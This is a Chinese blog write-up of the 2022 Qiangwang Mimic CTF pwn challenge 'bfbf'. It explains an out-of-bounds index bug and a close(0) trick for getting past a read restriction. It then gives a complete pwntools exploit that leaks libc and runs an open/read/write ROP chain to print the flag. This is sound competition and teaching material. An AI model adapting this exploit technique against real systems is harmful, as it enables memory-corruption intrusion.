2022强网拟态pwn-bfbf

最新推荐文章于 2023-02-03 15:24:21 发布
最新推荐文章于 2023-02-03 15:24:21 发布
阅读量497 收藏
点赞数 3
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/127890694
版权

2022强网拟态pwn-bfbf

在这里插入图片描述
这题笔者感觉就是绕过这个read的限制,之前遇见过类似的,可以用close(0)然后read读flag的时候rdi可以置为0,就可以绕过line 0005的限制了,赛后看其他师傅的wp还看到了用sendfile的方法
在这里插入图片描述
漏洞点的话就是index这个下标没有限制从而导致的oob
在这里插入图片描述
控制好这里的数字然后泄露出libc,再打返回地址到rop链即可
在这里插入图片描述
exp如下

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

p1 = b'>' * 0x238
p1 += (b'.' + b'>') * 6
p1 += b'<' * 6
p1 += (b',' + b'>') * 8 * 39
r.sendafter('BF_PARSER>>', p1)
libc_start_main = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 243
li('libc_start_main = ' + hex(libc_start_main))

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc_base = libc_start_main - libc.sym['__libc_start_main']
li('libc_base = ' + hex(libc_base))

pop_rdi_ret = 0x0000000000023b6a + libc_base
pop_rsi_ret = 0x000000000002601f + libc_base
pop_rdx_ret = 0x0000000000142c92 + libc_base
syscall_ret = 0x00000000000630a9 + libc_base
pop_rax_ret = 0x0000000000036174 + libc_base
flag_addr = 0x1ed840 + libc_base
#read
p2 = p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(flag_addr) + p64(pop_rdx_ret) + p64(8) + p64(pop_rax_ret) + p64(0) + p64(syscall_ret)
#close(0)
p2 += p64(pop_rdi_ret) + p64(0) + p64(pop_rax_ret) + p64(3) + p64(syscall_ret)
#open
p2 += p64(pop_rdi_ret) + p64(flag_addr) + p64(pop_rsi_ret) + p64(0) + p64(pop_rax_ret) + p64(2) + p64(syscall_ret)
#read
p2 += p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(flag_addr + 0x8) + p64(pop_rdx_ret) + p64(0x50) + p64(pop_rax_ret) + p64(0) + p64(syscall_ret)
#write
p2 += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(flag_addr + 0x8) + p64(pop_rdx_ret) + p64(0x50) + p64(pop_rax_ret) + p64(1) + p64(syscall_ret)
r.send(p2)
r.send('flag\x00')

r.interactive()

在这里插入图片描述

z1r0.
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
强网2022 pwn 赛题解析.docx
12-18
强网2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
2018强网杯CTF-题目整理-校本图片Readme.zip
最新发布
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
2022强网拟态pwn-store
z1r0的博客
11-22 711
首先是这个沙箱,64位只有r和w,一开始看的时候很纳闷多了32位的限制,64位还没有o,查了一下才知道这样的seccomp-tools是以64位的检查来检查的,所以上面显示的32位系统调用就是64位的系统调用,所以看一下上面在32位显示的这些实际上是多少。所以思路比较清楚,利用house of apple2控制程序流程,mprotect控制rwx权限,布置shellcode,需要注意的是远程flag文件名需要getdents找一下,找完了之后利用orw即可。chmod对应是0x5a,对应32位是mmap。
强网拟态REV-(fastjsoN)wp
Henlenl的博客
10-26 273
fastjsoN 依照这个链接可以知道 跟之前长安杯和看雪KCTF题目差不多 先用脚本恢复一下符号 0x02, 0x3A, 0x10, 0x6C, 0x6F, 0x6E, 0x67, 0x32, 0x73, 0x74, 0x72, 0x10, 0x73, 0x74, 0x72, 0x32, 0x6C, 0x6F, 0x6E, 0x67, 0x10, 0x73, 0x64, 0x66, 0x73, 0x66, 0x73, 0x64, 0x66, 0x0E, 0x73, 0x74, 0x72, 0x32,
强网杯-拟态
Stella_Leo的博客
08-24 301
做了一道拟态防御的题目。程序给了两个附件,一个32位一个64位。只有PIE保护没有开启。 32位 int vul() { char v1; // [esp+Ch] [ebp-10Ch] setbuf(stdin, 0); setbuf(stdout, 0); j_memset_ifunc((int)&v1, 0, 256); read(0, &v1, 768); return puts(&v1); } 非常明显的一个溢出 64位 __int64 vul()
2021强网拟态 pwn random_heap
yongbaoii的博客
01-18 195
题目的难度在于他chunk分配的地址是随机的。 如何能破掉这种随机。 我采取的方法是硬爆破,直到爆破到我想要的那种形式,我们加以利用。 爆破的过程中可以稍加采取限制,减少爆破时间。 # -*- coding: utf-8 -*- from pwn import* from ctypes import * #context.log_level='debug' context.arch='amd64' context.os = "linux" #context.terminal = ["tmux", "sp.
2022强网拟态 (部分wp)
qq_62046696的博客
02-03 529
这道题也是看了很久,因为没环境,然后其他的wp写的比较简单,对于我这种菜鸡逃逸28位自己琢磨了好久,这种序列化逃逸的题,需要我们提前构造然后一步步写。
2018强网杯CTF-题目整理.zip
12-17
2018强网杯CTF___题目整理
第四届“强网拟态防御国际精英挑战赛.zip
12-07
拟态防御 CTF 国际精英挑战赛
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1 本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战赛中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们...
2022拟态防御pwnbfbf
m0_63437215的博客
11-07 444
2022拟态防御pwn
第四届强网拟态 EasyFilter
feng的博客
11-04 540
前言 当时比赛没报名,借了个号上去瞅了一眼题目,看到这个PHP代码审计比较亲切就做了这一题,当时也是通过报错大胆尝试成功试了出来解法。 赛后花爷拿着我的wp去了p神的知识星球问了一下原理,P神给了个解答,但是自己还没有看过PHP的C代码所以很难理解(实际上都一年没有碰过C语言了)。恰好打算把最近的事情忙完就去学学PHP的底层,过了这么些天,昨天弄好了vscode调试PHP的C代码的环境,今天仔细研究了一下终于有点懂了,而且第一次看PHP的底层C,感觉学到了好多的东西。 做题时候写的WP <?php
强网杯2019 拟态 STKOF
seaaseesa的博客
04-09 1044
强网杯2019 拟态 STKOF 给了我们两个二进制,分别为32位和64位,两个程序功能完全相同,有一个裁决程序,fork出这两个程序,并监听着它们的输出,如果两者输出不一样或者一方崩溃,则裁决程序就会kill掉它们两个。 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,32位 64位 可知32位溢出的距离为0x110,64位溢出的距离为0x118。由于程序没有...
2021强网拟态复现
qq_46441427的博客
10-30 512
sonic checksec一下 发现开了PIE和NX还有relro,这里比赛的时候本来想打ret2csu的。。好像是这个名字。。忘了 程序打印出了main的地址,开PIE后三位不变,所以打印出main地址后直接取除了后三位的其他位,在ida找后三位地址加上就行,然后就可以栈溢出getshell from pwn import * #r=remote('123.60.63.90',6890) r = process('./sonic') context(arch='amd64', os='linux')
2022强网拟态pwn-webheap
z1r0的博客
11-21 926
index代表的是上图中的index,p8(0x82)代表后面要接一个p32的数据(这些都可以在上面的encoding_byte中找到是什么意思)p8(0xbd)代表的是字符串,接着后面会接content的长度和content,遵循上面的反序列化格式即可。上面给出10, “foo”,下面的compose的第一个就是0xb9,第二个是有几个参数,第三个是第一个参数的值,第四个是string类型,第五个是对应的foo的长度,第6个是foo这个字符串。所以笔者就配合前期逆向,顺着这上面的初步写了一个序列化实例。
第五届“强网拟态防御国际精英挑战赛——线上预选赛火热开赛!
Cyberpeace的博客
11-04 432
截至2022年,第五届“强网拟态防御国际精英挑战赛已累积接受全球万余支战队、数十万人次的参与!
第五届“强网拟态防御国际精英挑战赛——预选赛入围战队篇
Cyberpeace的博客
12-02 1152
第五届“强网拟态防御国际精英挑战赛战队集结完毕,期待各位顶峰相见!
重磅来袭 | 第五届“强网拟态防御国际精英挑战赛创新升级,燃爆全球!
Cyberpeace的博客
10-09 423
此外,线上预选赛会面向全球战队开放报名,具体报名信息即将发布,敬请期待!此外,本届比赛特别设置“实网验证挑战赛”,通过邀请战队实际验证的方式,直观展示车联网设备,在增加比赛挑战性和趣味性的同时,进一步检验拟态设备相较于非拟态设备的技术优越性,通过现场的设备反馈,使拟态防御效果更加真实可感。本届比赛创新开辟四大赛道,在第四届大赛引入ADAS设备测试的基础上,进一步将赛道细化为“互联网赛道”“车联网赛道”“电信网赛道”“密码机赛道”四项,激励具有技术专长的人才在比赛中发挥所长进行比拼。
2022强网pwn部分wp
N1rvana的博客
08-02 1489
2022强网pwn
强网杯-2022 yakagame
11-22
强网杯-2022 yakagame是一个国际性的网络安全竞赛,旨在提高参赛者在网络安全领域的技术能力和解决问题的能力。比赛的目标是通过攻防对抗的方式,测试参赛者在网络攻防、逆向工程、密码学等方面的知识与技能。 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值